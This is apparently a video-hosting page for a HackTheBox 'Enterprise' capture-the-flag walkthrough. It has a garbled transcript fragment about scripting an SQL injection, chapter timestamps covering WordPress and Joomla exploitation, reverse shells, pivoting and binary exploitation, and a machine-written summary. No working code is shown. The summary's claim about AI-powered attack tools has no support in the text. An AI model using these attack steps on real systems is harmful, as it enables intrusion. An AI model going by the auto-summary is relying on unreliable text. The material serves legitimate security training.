Python script to solve this for us and duplicate essentially what nmap is doing I know that map SQL map is doing so we'll do them inject pi is what we'll call it we use the request module and let's see content number is equal to what is it 32 let's go back to this query doing my browser I did so proxy and I slept on fresh Peter to code we're doing query 32 so content number will equal 32 actually let's call this first number is equal to 32 it's set content is equal to blank and we now need to create a value so values is equal to query and this is the get request portion back here I copy everything copy that and I think that's fine we can now let's see limit 30 to 1 and this needs to be different so dot format we'll call that one content number and the second one post number so all those two brackets did would say hey and this string where this is take the very first one out of this format thing so that's going to be content num which starts a

Original Description

01:00 - Begin of recon 10:00 - Finding the vulnerable Wordpress Plugin 17:50 - Exploiting lcars plugin 28:30 - Logging into WP and Getting Reverse Shell 35:00 - Wordpress RevShell Returned 40:00 - Using Meterpreter to pivot and provide access to MySQL 50:00 - MySQL Shell Returned 52:00 - Logging into Joomla and Getting Reverse Shell 57:20 - Joomla Reverse Shell returned 59:00 - Getting Reverse Shell on Host OS (port 443) 1:02:00 - Shell Returned begin of local privesc recon 1:12:06 - Beginning of Binary Exploitation 1:21:00 - Start writing exploit script ===== Extra Content ====== 1:28:30 - Analyzing the PHP SQL Injection Scripts 1:36:30 - Viewing what SQLMap does to exploit this 1:40:00 - Stepping through Double Query Injection 1:47:20 - Writing our own SQL Injection Exploit Script
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from IppSec · IppSec · 30 of 60

1 HHC2016 - Analytics
HHC2016 - Analytics
IppSec
2 HackTheBox - October
HackTheBox - October
IppSec
3 HackTheBox - Arctic
HackTheBox - Arctic
IppSec
4 HackTheBox - Brainfuck
HackTheBox - Brainfuck
IppSec
5 HackTheBox - Bank
HackTheBox - Bank
IppSec
6 HackTheBox - Joker
HackTheBox - Joker
IppSec
7 HackTheBox - Lazy
HackTheBox - Lazy
IppSec
8 Camp CTF 2015 - Bitterman
Camp CTF 2015 - Bitterman
IppSec
9 HackTheBox - Devel
HackTheBox - Devel
IppSec
10 Reversing Malicious Office Document (Macro) Emotet(?)
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
11 HackTheBox - Granny and Grandpa
HackTheBox - Granny and Grandpa
IppSec
12 HackTheBox - Pivoting Update: Granny and Grandpa
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
13 HackTheBox - Optimum
HackTheBox - Optimum
IppSec
14 HackTheBox - Charon
HackTheBox - Charon
IppSec
15 HackTheBox - Sneaky
HackTheBox - Sneaky
IppSec
16 HackTheBox - Holiday
HackTheBox - Holiday
IppSec
17 HackTheBox - Europa
HackTheBox - Europa
IppSec
18 Introduction to tmux
Introduction to tmux
IppSec
19 HackTheBox - Blocky
HackTheBox - Blocky
IppSec
20 HackTheBox - Nineveh
HackTheBox - Nineveh
IppSec
21 HackTheBox - Jail
HackTheBox - Jail
IppSec
22 HackTheBox - Blue
HackTheBox - Blue
IppSec
23 HackTheBox - Calamity
HackTheBox - Calamity
IppSec
24 HackTheBox - Shrek
HackTheBox - Shrek
IppSec
25 HackTheBox - Mirai
HackTheBox - Mirai
IppSec
26 HackTheBox - Shocker
HackTheBox - Shocker
IppSec
27 HackTheBox - Mantis
HackTheBox - Mantis
IppSec
28 HackTheBox - Node
HackTheBox - Node
IppSec
29 HackTheBox - Kotarak
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
HackTheBox - Enterprise
IppSec
31 HackTheBox - Sense
HackTheBox - Sense
IppSec
32 HackTheBox - Minion
HackTheBox - Minion
IppSec
33 VulnHub - Sokar
VulnHub - Sokar
IppSec
34 VulnHub - Pinkys Palace v2
VulnHub - Pinkys Palace v2
IppSec
35 HackTheBox - Inception
HackTheBox - Inception
IppSec
36 Vulnhub - Trollcave 1.2
Vulnhub - Trollcave 1.2
IppSec
37 HackTheBox - Ariekei
HackTheBox - Ariekei
IppSec
38 HackTheBox - Flux Capacitor
HackTheBox - Flux Capacitor
IppSec
39 HackTheBox - Jeeves
HackTheBox - Jeeves
IppSec
40 HackTheBox - Tally
HackTheBox - Tally
IppSec
41 HackTheBox - CrimeStoppers
HackTheBox - CrimeStoppers
IppSec
42 HackTheBox - Fulcrum
HackTheBox - Fulcrum
IppSec
43 HackTheBox - Chatterbox
HackTheBox - Chatterbox
IppSec
44 HackTheBox - Falafel
HackTheBox - Falafel
IppSec
45 How To Create Empire Modules
How To Create Empire Modules
IppSec
46 HackTheBox - Nightmare
HackTheBox - Nightmare
IppSec
47 HackTheBox - Nightmarev2  - Speed Run/Unintended Solutions
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
48 HackTheBox - Bart
HackTheBox - Bart
IppSec
49 HackTheBox -  Aragog
HackTheBox - Aragog
IppSec
50 HackTheBox - Valentine
HackTheBox - Valentine
IppSec
51 HackTheBox - Silo
HackTheBox - Silo
IppSec
52 HackTheBox - Rabbit
HackTheBox - Rabbit
IppSec
53 HackTheBox - Celestial
HackTheBox - Celestial
IppSec
54 HackTheBox - Stratosphere
HackTheBox - Stratosphere
IppSec
55 HackTheBox - Poison
HackTheBox - Poison
IppSec
56 HackTheBox - Canape
HackTheBox - Canape
IppSec
57 HackTheBox - Olympus
HackTheBox - Olympus
IppSec
58 HackTheBox - Sunday
HackTheBox - Sunday
IppSec
59 HackTheBox - Fighter
HackTheBox - Fighter
IppSec
60 HackTheBox - Bounty
HackTheBox - Bounty
IppSec

This video demonstrates a cybersecurity attack on a HackTheBox - Enterprise system, exploiting vulnerabilities in WordPress and Joomla to gain access to the system and ultimately obtain root access. The video covers topics such as pentesting, exploitation, and reverse engineering, and demonstrates the use of tools like Burp Suite, SQLMap, and Metasploit.

Key Takeaways
  1. Map the IP address of the box to a hostname
  2. Run the command 'nmap' to identify open ports
  3. Run the command 'ssh' to login to the box
  4. Run the command 'curl' to view the content of a webpage
  5. Run the command 'dig' to view the DNS records of a domain
  6. Use DirBuster to find a WordPress login page and brute-force the password for William Riker
  7. Execute code on the WordPress site to gain access
  8. Modify a template file to add code that allows system command execution
  9. Use a reverse shell to gain access to the system
  10. Find the IP address of the system and use it to connect to the system
💡 The video demonstrates the importance of securing web applications and the potential consequences of failing to do so. It also highlights the use of AI-powered tools in cybersecurity attacks and the need for defensive strategies to protect against such threats.

Related Reads

📰
I Patched My OpenClaw Instance Against the Claw Chain Vulnerabilities in 40 Minutes — Here's the Checklist
Learn how to patch OpenClaw instances against Claw Chain Vulnerabilities in under an hour with a simple checklist
Dev.to AI
📰
New Mac malware masquerades as Apple's crash reporter: 3 ways to dodge the threat
Learn about CrashStealer, a new Mac malware, and how to protect yourself from its data-stealing capabilities
ZDNet
📰
This free Mac tool lets me see which apps are quietly accessing the internet - and block them fast
Learn how to use Firewally to monitor and block unwanted internet access on your Mac
ZDNet
📰
The White House Wants AI To Beat Hackers To The Patch With “Gold Eagle”
The White House's Gold Eagle initiative uses AI to identify and fix vulnerabilities before hackers can exploit them, and it matters for national cybersecurity
Forbes Innovation

Chapters (17)

1:00 Begin of recon
10:00 Finding the vulnerable Wordpress Plugin
17:50 Exploiting lcars plugin
28:30 Logging into WP and Getting Reverse Shell
35:00 Wordpress RevShell Returned
40:00 Using Meterpreter to pivot and provide access to MySQL
50:00 MySQL Shell Returned
52:00 Logging into Joomla and Getting Reverse Shell
57:20 Joomla Reverse Shell returned
59:00 Getting Reverse Shell on Host OS (port 443)
1:02:00 Shell Returned begin of local privesc recon
1:12:06 Beginning of Binary Exploitation
1:21:00 Start writing exploit script
1:28:30 Analyzing the PHP SQL Injection Scripts
1:36:30 Viewing what SQLMap does to exploit this
1:40:00 Stepping through Double Query Injection
1:47:20 Writing our own SQL Injection Exploit Script
Up next
Is your free email putting your bank account at risk? #Podcast #Interview #Efani #BankAccounts
efani
Watch →